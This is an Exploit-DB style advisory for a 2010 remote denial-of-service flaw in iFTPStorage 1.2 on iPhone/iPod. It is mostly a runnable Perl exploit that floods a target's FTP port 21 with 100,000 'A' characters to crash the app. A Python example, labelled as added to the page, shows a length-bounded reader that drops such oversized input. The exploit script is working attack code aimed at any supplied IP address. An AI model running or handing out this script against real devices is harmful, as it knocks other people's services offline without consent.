Vendor: iFTPStorage
By: Ale46
CVSS: 7.5 (HIGH)
CWE: Remote Denial of Service
Product Name: iFTPStorage
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Platforms Tested: iPhone 3GS with 3.1.2 firmware
2010

iFTPStorage for iPhone/iPod – Remote DoS Exploit

This exploit allows an attacker to remotely crash the iFTPStorage application on iPhone and iPod. When sent a large buffer of 'A' characters, the application crashes and becomes unresponsive.

Mitigation:

No known mitigation or remediation available.
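
Added example (not part of the original advisory and not the vendor's code): a length-bounded reader for FTP control-channel input, the kind of check a server or an inline filter can apply so that an unterminated run of bytes like the one the script below sends is dropped instead of buffered. The page does not state the root cause of the crash; the 512-byte cap, the class and function names, and the sample inputs are assumptions made for illustration.

```python
# Added example: bounded reader for FTP control-channel input.
# MAX_LINE and every name here are assumptions, not values from the advisory.
MAX_LINE = 512  # assumed cap; real FTP commands are far shorter


class OverlongCommand(Exception):
    """Raised when a peer sends more than the cap without a CRLF."""


class ControlChannelReader:
    def __init__(self, max_line=MAX_LINE):
        self.max_line = max_line
        self._buf = bytearray()

    def feed(self, chunk: bytes) -> list:
        """Consume one recv() chunk; return the complete command lines in it."""
        lines = []
        self._buf += chunk
        while (end := self._buf.find(b"\r\n")) != -1:
            if end > self.max_line:
                raise OverlongCommand(f"{end} bytes before CRLF")
            lines.append(bytes(self._buf[:end]))
            del self._buf[:end + 2]
        # Unterminated remainder: refuse to keep buffering past the cap.
        # A trailing "\r" may be the first half of a split CRLF, so allow +1.
        if len(self._buf) > self.max_line + 1:
            pending = len(self._buf)
            self._buf.clear()
            raise OverlongCommand(f"{pending} bytes without CRLF")
        return lines


def classify(chunks, max_line=MAX_LINE):
    """Return ('ok', commands) or ('drop', reason) for a sequence of chunks."""
    reader, commands = ControlChannelReader(max_line), []
    try:
        for chunk in chunks:
            commands += reader.feed(chunk)
    except OverlongCommand as exc:
        return ("drop", str(exc))
    return ("ok", commands)


# Constructed inputs: a normal login split across two reads, and an
# unterminated run of 'A' bytes arriving in 4 KiB chunks.
NORMAL = [b"USER anonymous\r\nPA", b"SS guest\r\n"]
FLOOD = [b"A" * 4096] * 25
```

On a "drop" result the caller closes the connection, so the oversized input never reaches the command parser.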

Exploit-DB raw data:

#!/usr/bin/perl
#
# Exploit: iFTPStorage for Iphone\Ipod - Remote Dos Exploit
# Date: 20/02/10
# Author: Ale46
# Software Link:
# http://itunes.apple.com/us/app/iftpstorage/id333357690?mt=8
# Version: 1.2
# Tested on: Iphone 3GS with 3.1.2 firmware
# Note: iFTPStorage Lite is also vulnerable
# Greetz: Gandalf

use strict;
use warnings;
use IO::Socket;

# Require the target address as the only argument
if (@ARGV < 1) {
    print("Usage: ./iFTPStorage <server_ip>\n");
    exit();
}

my $host = $ARGV[0];
my $port = 21;                 # FTP control port
my $stuff = "A" x 100000;      # buffer of 100000 'A' characters
my $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host,
                                   PeerPort => $port);
unless ($socket) { die "Can\'t connect to $host" }
print "Sending evil buffer..\n";
sleep(2);
print $socket $stuff;
sleep(2);
print "Crashed..";